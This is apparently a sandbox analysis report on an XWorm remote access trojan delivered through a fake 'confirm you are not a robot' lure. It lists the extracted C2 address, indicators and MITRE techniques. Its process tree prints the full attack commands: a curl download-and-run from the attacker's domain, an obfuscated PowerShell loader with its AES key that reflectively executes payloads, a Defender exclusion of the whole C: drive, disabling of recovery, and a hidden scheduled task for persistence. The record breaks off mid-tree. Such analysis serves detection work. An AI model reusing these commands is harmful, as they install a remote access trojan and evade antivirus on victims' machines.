xworm | hxxp://onlyfans[.]ong

Analysis

max time kernel
300s
max time network
299s
platform
windows10-ltsc 2021_x64
resource
win10ltsc2021-20250217-en
resource tags

arch:x64arch:x86image:win10ltsc2021-20250217-enlocale:en-usos:windows10-ltsc 2021-x64system
submitted
01/03/2025, 22:20

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

http://onlyfans.ong

Score

10^/10

xworm discovery execution rat trojan

Malware Config

Extracted

Family

xworm

Version

5.0

45.154.98.138:5939

Mutex

iVJRN7HmpQeCP6EU

Attributes

install_file
USB.exe

aes.plain

Signatures

Detect Xworm Payload 1 IoCs

resource	yara_rule
behavioral2/memory/3720-168-0x000002D7C9290000-0x000002D7C92A0000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Blocklisted process makes network request 3 IoCs

flow	pid	Process
62	3720	powershell.exe
73	3720	powershell.exe
74	3720	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
2032	powershell.exe
1716	powershell.exe
4696	powershell.exe
5724	powershell.exe
4292	powershell.exe
4052	powershell.exe
5524	powershell.exe
1352	powershell.exe
4084	powershell.exe
3720	powershell.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3524754987-2550789650-2995585052-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3524754987-2550789650-2995585052-1000\Control Panel\International\Geo\Nation	WScript.exe

Drops file in System32 directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\Recovery	reagentc.exe
File opened for modification	C:\Windows\system32\Recovery\ReAgent.xml	reagentc.exe

Drops file in Windows directory 17 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Panther\UnattendGC\diagwrn.xml	reagentc.exe
File opened for modification	C:\Windows\Panther\UnattendGC\diagerr.xml	reagentc.exe
File opened for modification	C:\Windows\Panther\UnattendGC\diagwrn.xml	reagentc.exe
File opened for modification	C:\Windows\Logs\ReAgent\ReAgent.log	reagentc.exe
File opened for modification	C:\Windows\Panther\UnattendGC\diagerr.xml	reagentc.exe
File opened for modification	C:\Windows\Logs\ReAgent\ReAgent.log	reagentc.exe
File opened for modification	C:\Windows\Logs\ReAgent\ReAgent.log	reagentc.exe
File opened for modification	C:\Windows\Panther\UnattendGC\setuperr.log	reagentc.exe
File opened for modification	C:\Windows\Panther\UnattendGC\diagwrn.xml	reagentc.exe
File opened for modification	C:\Windows\SystemTemp	chrome.exe
File opened for modification	C:\Windows\Panther\UnattendGC\setuperr.log	reagentc.exe
File opened for modification	C:\Windows\Panther\UnattendGC\diagerr.xml	reagentc.exe
File opened for modification	C:\Windows\Panther\UnattendGC\diagwrn.xml	reagentc.exe
File opened for modification	C:\Windows\Panther\UnattendGC\diagerr.xml	reagentc.exe
File opened for modification	C:\Windows\Logs\ReAgent\ReAgent.log	reagentc.exe
File opened for modification	C:\Windows\Panther\UnattendGC\setuperr.log	reagentc.exe
File opened for modification	C:\Windows\Panther\UnattendGC\setuperr.log	reagentc.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133853412517399079"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe

Modifies registry class 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3524754987-2550789650-2995585052-1000_Classes\Local Settings	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-3524754987-2550789650-2995585052-1000_Classes\Local Settings	powershell.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4392	chrome.exe
4392	chrome.exe
1352	powershell.exe
1352	powershell.exe
1352	powershell.exe
2032	powershell.exe
2032	powershell.exe
2032	powershell.exe
4084	powershell.exe
4084	powershell.exe
4084	powershell.exe
3720	powershell.exe
3720	powershell.exe
3720	powershell.exe
1716	powershell.exe
1716	powershell.exe
1716	powershell.exe
3720	powershell.exe
3720	powershell.exe
3720	powershell.exe
3720	powershell.exe
3720	powershell.exe
3720	powershell.exe
3720	powershell.exe
3720	powershell.exe
3720	powershell.exe
3720	powershell.exe
3720	powershell.exe
3720	powershell.exe
3720	powershell.exe
3720	powershell.exe
3720	powershell.exe
3720	powershell.exe
3720	powershell.exe
3720	powershell.exe
3720	powershell.exe
3720	powershell.exe
3720	powershell.exe
3720	powershell.exe
3720	powershell.exe
3720	powershell.exe
3720	powershell.exe
3720	powershell.exe
3720	powershell.exe
3720	powershell.exe
3720	powershell.exe
3720	powershell.exe
3720	powershell.exe
4292	powershell.exe
4292	powershell.exe
4292	powershell.exe
4696	powershell.exe
4696	powershell.exe
4696	powershell.exe
4052	powershell.exe
4052	powershell.exe
4052	powershell.exe
5524	powershell.exe
5524	powershell.exe
5524	powershell.exe
5724	powershell.exe
5724	powershell.exe
5724	powershell.exe
5152	chrome.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 3 IoCs

pid	Process
4392	chrome.exe
4392	chrome.exe
4392	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	4392	chrome.exe
Token: SeCreatePagefilePrivilege	4392	chrome.exe
Token: SeShutdownPrivilege	4392	chrome.exe
Token: SeCreatePagefilePrivilege	4392	chrome.exe
Token: SeShutdownPrivilege	4392	chrome.exe
Token: SeCreatePagefilePrivilege	4392	chrome.exe
Token: SeShutdownPrivilege	4392	chrome.exe
Token: SeCreatePagefilePrivilege	4392	chrome.exe
Token: SeShutdownPrivilege	4392	chrome.exe
Token: SeCreatePagefilePrivilege	4392	chrome.exe
Token: SeShutdownPrivilege	4392	chrome.exe
Token: SeCreatePagefilePrivilege	4392	chrome.exe
Token: SeShutdownPrivilege	4392	chrome.exe
Token: SeCreatePagefilePrivilege	4392	chrome.exe
Token: SeShutdownPrivilege	4392	chrome.exe
Token: SeCreatePagefilePrivilege	4392	chrome.exe
Token: SeShutdownPrivilege	4392	chrome.exe
Token: SeCreatePagefilePrivilege	4392	chrome.exe
Token: SeShutdownPrivilege	4392	chrome.exe
Token: SeCreatePagefilePrivilege	4392	chrome.exe
Token: SeShutdownPrivilege	4392	chrome.exe
Token: SeCreatePagefilePrivilege	4392	chrome.exe
Token: SeShutdownPrivilege	4392	chrome.exe
Token: SeCreatePagefilePrivilege	4392	chrome.exe
Token: SeShutdownPrivilege	4392	chrome.exe
Token: SeCreatePagefilePrivilege	4392	chrome.exe
Token: SeShutdownPrivilege	4392	chrome.exe
Token: SeCreatePagefilePrivilege	4392	chrome.exe
Token: SeShutdownPrivilege	4392	chrome.exe
Token: SeCreatePagefilePrivilege	4392	chrome.exe
Token: SeShutdownPrivilege	4392	chrome.exe
Token: SeCreatePagefilePrivilege	4392	chrome.exe
Token: SeShutdownPrivilege	4392	chrome.exe
Token: SeCreatePagefilePrivilege	4392	chrome.exe
Token: SeShutdownPrivilege	4392	chrome.exe
Token: SeCreatePagefilePrivilege	4392	chrome.exe
Token: SeShutdownPrivilege	4392	chrome.exe
Token: SeCreatePagefilePrivilege	4392	chrome.exe
Token: SeShutdownPrivilege	4392	chrome.exe
Token: SeCreatePagefilePrivilege	4392	chrome.exe
Token: SeShutdownPrivilege	4392	chrome.exe
Token: SeCreatePagefilePrivilege	4392	chrome.exe
Token: SeShutdownPrivilege	4392	chrome.exe
Token: SeCreatePagefilePrivilege	4392	chrome.exe
Token: SeShutdownPrivilege	4392	chrome.exe
Token: SeCreatePagefilePrivilege	4392	chrome.exe
Token: SeShutdownPrivilege	4392	chrome.exe
Token: SeCreatePagefilePrivilege	4392	chrome.exe
Token: SeShutdownPrivilege	4392	chrome.exe
Token: SeCreatePagefilePrivilege	4392	chrome.exe
Token: SeShutdownPrivilege	4392	chrome.exe
Token: SeCreatePagefilePrivilege	4392	chrome.exe
Token: SeShutdownPrivilege	4392	chrome.exe
Token: SeCreatePagefilePrivilege	4392	chrome.exe
Token: SeShutdownPrivilege	4392	chrome.exe
Token: SeCreatePagefilePrivilege	4392	chrome.exe
Token: SeShutdownPrivilege	4392	chrome.exe
Token: SeCreatePagefilePrivilege	4392	chrome.exe
Token: SeShutdownPrivilege	4392	chrome.exe
Token: SeCreatePagefilePrivilege	4392	chrome.exe
Token: SeShutdownPrivilege	4392	chrome.exe
Token: SeCreatePagefilePrivilege	4392	chrome.exe
Token: SeShutdownPrivilege	4392	chrome.exe
Token: SeCreatePagefilePrivilege	4392	chrome.exe

Suspicious use of FindShellTrayWindow 26 IoCs

pid	Process
4392	chrome.exe
4392	chrome.exe
4392	chrome.exe
4392	chrome.exe
4392	chrome.exe
4392	chrome.exe
4392	chrome.exe
4392	chrome.exe
4392	chrome.exe
4392	chrome.exe
4392	chrome.exe
4392	chrome.exe
4392	chrome.exe
4392	chrome.exe
4392	chrome.exe
4392	chrome.exe
4392	chrome.exe
4392	chrome.exe
4392	chrome.exe
4392	chrome.exe
4392	chrome.exe
4392	chrome.exe
4392	chrome.exe
4392	chrome.exe
4392	chrome.exe
4392	chrome.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
4392	chrome.exe
4392	chrome.exe
4392	chrome.exe
4392	chrome.exe
4392	chrome.exe
4392	chrome.exe
4392	chrome.exe
4392	chrome.exe
4392	chrome.exe
4392	chrome.exe
4392	chrome.exe
4392	chrome.exe
4392	chrome.exe
4392	chrome.exe
4392	chrome.exe
4392	chrome.exe
4392	chrome.exe
4392	chrome.exe
4392	chrome.exe
4392	chrome.exe
4392	chrome.exe
4392	chrome.exe
4392	chrome.exe
4392	chrome.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
3720	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4392 wrote to memory of 3616	4392	chrome.exe	81
PID 4392 wrote to memory of 3616	4392	chrome.exe	81
PID 4392 wrote to memory of 3464	4392	chrome.exe	82
PID 4392 wrote to memory of 3464	4392	chrome.exe	82
PID 4392 wrote to memory of 3464	4392	chrome.exe	82
PID 4392 wrote to memory of 3464	4392	chrome.exe	82
PID 4392 wrote to memory of 3464	4392	chrome.exe	82
PID 4392 wrote to memory of 3464	4392	chrome.exe	82
PID 4392 wrote to memory of 3464	4392	chrome.exe	82
PID 4392 wrote to memory of 3464	4392	chrome.exe	82
PID 4392 wrote to memory of 3464	4392	chrome.exe	82
PID 4392 wrote to memory of 3464	4392	chrome.exe	82
PID 4392 wrote to memory of 3464	4392	chrome.exe	82
PID 4392 wrote to memory of 3464	4392	chrome.exe	82
PID 4392 wrote to memory of 3464	4392	chrome.exe	82
PID 4392 wrote to memory of 3464	4392	chrome.exe	82
PID 4392 wrote to memory of 3464	4392	chrome.exe	82
PID 4392 wrote to memory of 3464	4392	chrome.exe	82
PID 4392 wrote to memory of 3464	4392	chrome.exe	82
PID 4392 wrote to memory of 3464	4392	chrome.exe	82
PID 4392 wrote to memory of 3464	4392	chrome.exe	82
PID 4392 wrote to memory of 3464	4392	chrome.exe	82
PID 4392 wrote to memory of 3464	4392	chrome.exe	82
PID 4392 wrote to memory of 3464	4392	chrome.exe	82
PID 4392 wrote to memory of 3464	4392	chrome.exe	82
PID 4392 wrote to memory of 3464	4392	chrome.exe	82
PID 4392 wrote to memory of 3464	4392	chrome.exe	82
PID 4392 wrote to memory of 3464	4392	chrome.exe	82
PID 4392 wrote to memory of 3464	4392	chrome.exe	82
PID 4392 wrote to memory of 3464	4392	chrome.exe	82
PID 4392 wrote to memory of 3464	4392	chrome.exe	82
PID 4392 wrote to memory of 3464	4392	chrome.exe	82
PID 4392 wrote to memory of 4316	4392	chrome.exe	83
PID 4392 wrote to memory of 4316	4392	chrome.exe	83
PID 4392 wrote to memory of 1052	4392	chrome.exe	84
PID 4392 wrote to memory of 1052	4392	chrome.exe	84
PID 4392 wrote to memory of 1052	4392	chrome.exe	84
PID 4392 wrote to memory of 1052	4392	chrome.exe	84
PID 4392 wrote to memory of 1052	4392	chrome.exe	84
PID 4392 wrote to memory of 1052	4392	chrome.exe	84
PID 4392 wrote to memory of 1052	4392	chrome.exe	84
PID 4392 wrote to memory of 1052	4392	chrome.exe	84
PID 4392 wrote to memory of 1052	4392	chrome.exe	84
PID 4392 wrote to memory of 1052	4392	chrome.exe	84
PID 4392 wrote to memory of 1052	4392	chrome.exe	84
PID 4392 wrote to memory of 1052	4392	chrome.exe	84
PID 4392 wrote to memory of 1052	4392	chrome.exe	84
PID 4392 wrote to memory of 1052	4392	chrome.exe	84
PID 4392 wrote to memory of 1052	4392	chrome.exe	84
PID 4392 wrote to memory of 1052	4392	chrome.exe	84
PID 4392 wrote to memory of 1052	4392	chrome.exe	84
PID 4392 wrote to memory of 1052	4392	chrome.exe	84
PID 4392 wrote to memory of 1052	4392	chrome.exe	84
PID 4392 wrote to memory of 1052	4392	chrome.exe	84
PID 4392 wrote to memory of 1052	4392	chrome.exe	84
PID 4392 wrote to memory of 1052	4392	chrome.exe	84
PID 4392 wrote to memory of 1052	4392	chrome.exe	84
PID 4392 wrote to memory of 1052	4392	chrome.exe	84
PID 4392 wrote to memory of 1052	4392	chrome.exe	84
PID 4392 wrote to memory of 1052	4392	chrome.exe	84
PID 4392 wrote to memory of 1052	4392	chrome.exe	84
PID 4392 wrote to memory of 1052	4392	chrome.exe	84
PID 4392 wrote to memory of 1052	4392	chrome.exe	84
PID 4392 wrote to memory of 1052	4392	chrome.exe	84

cURL User-Agent 2 IoCs

Uses User-Agent string associated with cURL utility.

description	flow	ioc
HTTP User-Agent header	54	curl/8.7.1
HTTP User-Agent header	65	curl/8.7.1

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument http://onlyfans.ong
1⤵
- Drops file in Windows directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4392
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x21c,0x220,0x224,0x1f8,0x228,0x7ff96d2ccc40,0x7ff96d2ccc4c,0x7ff96d2ccc58
  2⤵
  PID:3616
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1940,i,18266050789670050364,16949268989885198093,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=1936 /prefetch:2
  2⤵
  PID:3464
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2200,i,18266050789670050364,16949268989885198093,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=1852 /prefetch:3
  2⤵
  PID:4316
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2244,i,18266050789670050364,16949268989885198093,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2268 /prefetch:8
  2⤵
  PID:1052
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3060,i,18266050789670050364,16949268989885198093,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3080 /prefetch:1
  2⤵
  PID:392
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3064,i,18266050789670050364,16949268989885198093,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3280 /prefetch:1
  2⤵
  PID:3576
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=2304,i,18266050789670050364,16949268989885198093,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4524 /prefetch:1
  2⤵
  PID:4716
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=3376,i,18266050789670050364,16949268989885198093,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3332 /prefetch:8
  2⤵
  PID:4792
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.4355 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=3084,i,18266050789670050364,16949268989885198093,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=840 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:5152

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:3884

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:2560

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c curl.exe -k -Ss "https://onlyfans.ong/fodnvishvkshu/fedora.bat" -o "C:\Users\Admin\Zflare.bat" && start "" "C:\Users\Admin\Zflare.bat" By pressing OK you confirm you are not a robot.
1⤵
PID:4500
- C:\Windows\system32\curl.exe
  curl.exe -k -Ss "https://onlyfans.ong/fodnvishvkshu/fedora.bat" -o "C:\Users\Admin\Zflare.bat"
  2⤵
  PID:4412
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /K "C:\Users\Admin\Zflare.bat" By pressing OK you confirm you are not a robot.
  2⤵
  PID:2872
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command $batPath_var = 'C:\Users\Admin\Zflare.bat';function execute_function($param_var,$param2_var){ $obfstep1_var=[System.Reflection.Assembly]::Load([byte[]]$param_var); $obfstep2_var=$obfstep1_var.EntryPoint; $obfstep2_var.Invoke($null, $param2_var);}function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::FromBase64String('AMclMxV1Dlk4dZ9xhbeJ8BRXNPk2xSdjNKmZKsaNmvY='); $aes_var.IV=[System.Convert]::FromBase64String('3BwBnL3TCjApahEOZRTO8g=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $return_var;}$host.UI.RawUI.WindowTitle = $batPath_var;$sysIOFile_var = [type]::GetType('Syst'+'em'+'.IO'+'.Fil'+'e');$env_var = [type]::GetType('Sy'+'s'+'tem'+'.E'+'nvi'+'ro'+'n'+'m'+'ent');$fileContent_var = $sysIOFile_var::ReadAllText($batPath_var);$newline_var = $env_var::NewLine;$splitMethod_var = $fileContent_var.Split($newline_var);$contents_var = $splitMethod_var;foreach ($line_var in $contents_var) { if ($line_var.StartsWith(':: ')) { $lastline_var=$line_var.Substring(10); break; }}$payloads_var=[string[]]$lastline_var.Split('\');$payload1_var=decrypt_function([Convert]::FromBase64String($payloads_var[0]));$payload2_var=decrypt_function([Convert]::FromBase64String($payloads_var[1]));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('By pressing OK you confirm you are not a robot.'));
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    PID:1352
  - - C:\Windows\system32\reagentc.exe
      "reagentc.exe" /disable
      4⤵
      Drops file in System32 directory
      Drops file in Windows directory
      PID:1500
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:2032
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'Realtek-Audio' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Local\Realtek-Hub\0dwthqxv3jj6.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:4084
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Realtek-Hub\0dwthqxv3jj6.vbs"
      4⤵
      Checks computer location settings
      PID:560
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Realtek-Hub\0dwthqxv3jj6.bat" "
        5⤵
        
        PID:3208
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command $batPath_var = 'C:\Users\Admin\AppData\Local\Realtek-Hub\0dwthqxv3jj6.bat';function execute_function($param_var,$param2_var){ $obfstep1_var=[System.Reflection.Assembly]::Load([byte[]]$param_var); $obfstep2_var=$obfstep1_var.EntryPoint; $obfstep2_var.Invoke($null, $param2_var);}function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::FromBase64String('AMclMxV1Dlk4dZ9xhbeJ8BRXNPk2xSdjNKmZKsaNmvY='); $aes_var.IV=[System.Convert]::FromBase64String('3BwBnL3TCjApahEOZRTO8g=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $return_var;}$host.UI.RawUI.WindowTitle = $batPath_var;$sysIOFile_var = [type]::GetType('Syst'+'em'+'.IO'+'.Fil'+'e');$env_var = [type]::GetType('Sy'+'s'+'tem'+'.E'+'nvi'+'ro'+'n'+'m'+'ent');$fileContent_var = $sysIOFile_var::ReadAllText($batPath_var);$newline_var = $env_var::NewLine;$splitMethod_var = $fileContent_var.Split($newline_var);$contents_var = $splitMethod_var;foreach ($line_var in $contents_var) { if ($line_var.StartsWith(':: ')) { $lastline_var=$line_var.Substring(10); break; }}$payloads_var=[string[]]$lastline_var.Split('\');$payload1_var=decrypt_function([Convert]::FromBase64String($payloads_var[0]));$payload2_var=decrypt_function([Convert]::FromBase64String($payloads_var[1]));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        6⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        
        PID:3720
        
        C:\Windows\system32\reagentc.exe
        
        "reagentc.exe" /disable
        7⤵
        Drops file in Windows directory
        
        PID:1564
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:1716

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c curl.exe -k -Ss "https://onlyfans.ong/fodnvishvkshu/fedora.bat" -o "C:\Users\Admin\Zflare.bat" && start "" "C:\Users\Admin\Zflare.bat" By pressing OK you confirm you are not a robot.
1⤵
PID:4696
- C:\Windows\system32\curl.exe
  curl.exe -k -Ss "https://onlyfans.ong/fodnvishvkshu/fedora.bat" -o "C:\Users\Admin\Zflare.bat"
  2⤵
  PID:4420
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /K "C:\Users\Admin\Zflare.bat" By pressing OK you confirm you are not a robot.
  2⤵
  PID:1248
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command $batPath_var = 'C:\Users\Admin\Zflare.bat';function execute_function($param_var,$param2_var){ $obfstep1_var=[System.Reflection.Assembly]::Load([byte[]]$param_var); $obfstep2_var=$obfstep1_var.EntryPoint; $obfstep2_var.Invoke($null, $param2_var);}function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::FromBase64String('AMclMxV1Dlk4dZ9xhbeJ8BRXNPk2xSdjNKmZKsaNmvY='); $aes_var.IV=[System.Convert]::FromBase64String('3BwBnL3TCjApahEOZRTO8g=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $return_var;}$host.UI.RawUI.WindowTitle = $batPath_var;$sysIOFile_var = [type]::GetType('Syst'+'em'+'.IO'+'.Fil'+'e');$env_var = [type]::GetType('Sy'+'s'+'tem'+'.E'+'nvi'+'ro'+'n'+'m'+'ent');$fileContent_var = $sysIOFile_var::ReadAllText($batPath_var);$newline_var = $env_var::NewLine;$splitMethod_var = $fileContent_var.Split($newline_var);$contents_var = $splitMethod_var;foreach ($line_var in $contents_var) { if ($line_var.StartsWith(':: ')) { $lastline_var=$line_var.Substring(10); break; }}$payloads_var=[string[]]$lastline_var.Split('\');$payload1_var=decrypt_function([Convert]::FromBase64String($payloads_var[0]));$payload2_var=decrypt_function([Convert]::FromBase64String($payloads_var[1]));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('By pressing OK you confirm you are not a robot.'));
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    PID:4292
  - - C:\Windows\system32\reagentc.exe
      "reagentc.exe" /disable
      4⤵
      Drops file in Windows directory
      PID:4444
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:4696
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
